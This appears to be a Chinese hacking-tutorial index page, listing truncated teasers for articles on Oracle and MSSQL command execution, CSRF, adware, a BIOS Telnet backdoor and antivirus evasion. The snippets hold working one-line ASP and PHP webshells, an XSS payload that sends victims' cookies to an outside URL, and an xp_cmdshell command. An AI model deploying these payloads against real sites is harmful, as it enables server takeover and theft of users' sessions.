小编 安全教程 批处理也疯狂 @echo off set c=00123456789ABCDEF0 :loop set /a num=%random%%%16 call set col=%%c:~%num%,2%% COLOR %col% ping -n3 ...
小编 安全教程 正则表达式的基本语法 正则表达式的基本语法 首先让我们看两个特殊的符号\’^\’和\’$\’。他们的作用是分别指出一个字符串的开始和结束。例子如下: "^The":表示所有以"The...
小编 安全教程 犀利的 oracle 注入技术 犀利的 oracle 注入技术 原文发表在黑客手册 linx 2008.1.12 介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。 以下的演示都是在web上的sql plus执行的,在web注入时 把selec...
小编 安全教程 一句话木马(asp,php) 总结篇 asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#&qu...
小编 安全教程 CSRF—攻击与防御 0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把...
小编 安全教程 mssql的sa权限执行命令方法总结 测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动) 一.xp_cmdshell EXEC master..xp_cmdshell ‘ipconfig’ 开启xp_c...
小编 安全教程 弹窗口的流氓软件核心代码 ps:请勿用于非法用途,仅供技术研究之用。 by:yunshu 这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代码到exp...
小编 安全教程 asp php XSS获取cookie的代码 <script>document.write(\'<img src="http://url/news.asp?msg=\’+document.cookie+\’" width=0 heigh...
小编 安全教程 用U盘就可黑进有密码的Windows系统 【赛迪网-IT技术报道】U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进...
小编 安全教程 冰河暗涌防不胜防 BIOS下实现的Telnet后门 该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。 项目涉及的相关知识及技术目录 1、 实验环境,使用bochs调试工具。 2...
小编 安全教程 木马免杀绝招以及常用的修改方法 常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。 …常用的木马免杀方法 绝招一:快速搞定瑞星文件查杀 操作步骤: 第一步:用OD载入,来到程序的入口点。 第二步:把入口点的第一句PUSH...